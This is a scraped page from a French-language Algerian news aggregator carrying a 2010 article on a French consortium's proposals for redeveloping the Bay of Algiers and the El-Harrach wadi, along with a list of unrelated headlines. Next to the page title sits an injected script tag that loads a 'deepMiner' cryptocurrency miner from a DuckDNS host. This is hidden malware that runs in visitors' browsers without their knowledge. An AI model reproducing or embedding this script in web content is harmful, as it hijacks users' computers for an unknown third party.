googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Aménagement de la baie d'Alger : Un groupement français propose ses solutions<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Aménagement de la baie d'Alger : Un groupement français propose ses solutions
Publié dans Horizons le 28 - 06 - 2010


Faire d'Alger, la capitale, une éco métropole de la Méditerranée, est l'enjeu visé par les actions prioritaires préconisées par l'étude d'aménagement de la baie d'Alger, initiée par la wilaya d'Alger. D'une superficie globale de 1600 hectares et s'étalant de Aïn Benian à l'ouest jusqu'à Aïn Taya à l'est, la baie d'Alger constitue l'une des attractions touristiques majeures de la capitale. Confiée au groupement français Arte Charpentier Architectes, l'étude du projet qui concerne les cinq premiers kilomètres de l'oued El-Harrach s'étendant de l'embouchure jusqu'au viaduc de la Rocade sud est en phase d'achèvement. Les représentants du groupement l'ont confirmé dimanche dernier en présence du ministre des Ressources en eau et du wali d'Alger. L'aménagement de la baie d'Alger s'articule autour de trois principaux axes : la revalorisation de la façade maritime et de l'espace urbain, la reconquête des ports et nouvelles polarités économiques ainsi que la renaturalisation de la ville. Pour mettre Alger en mouvement, le groupement propose sept actions clés. Il s'agit de la mise en place d'un schéma de cohérence s'articulant autour du collier de perles et des grands équipements structurants. Ce schéma de cohérence tentera de faire de l'oued El Harrach un centre de gravité de la baie d'Alger. Les actions prioritaires préconisées par l'étude du groupement consistent à traiter les sédiments de curage, particulièrement les charges polluantes, en réalisant des jardins filtrants, tout le long de l'oued sur les berges. Renaturaliser les berges de l'oued est un axe majeur de ce schéma. Les concepteurs du projet estiment qu'il faut «végétaliser» les bordures avec des plantes des zones humides. Ce qui permettra leur stabilisation et le traitement d'une partie des charges polluantes. L'étude évoque également la désinfection des eaux de la station dépuration des eaux polluées de Baraki. Avant le rejet des eaux épurées, un traitement tertiaire est nécessaire. Cette eau épurée servira au soutien de l'étiage de l'oued El Harrach. Elle permet également l'irrigation des zones agricoles de la plaine de la Mitidja. L'étude prévoit également l'aménagement de l'embouchure de l'oued, en créant un port de plaisance à l'endroit des actuels dépôts d'hydrocarbures. Et pour ouvrir la ville sur la mer, l'étude propose «l'aménagement de la grande promenade d'Alger», en procédant à la restructuration de quelques axes de la Place des Martyrs et à aménager des terrasses au niveau du port.

Cliquez ici pour lire l'article depuis sa source.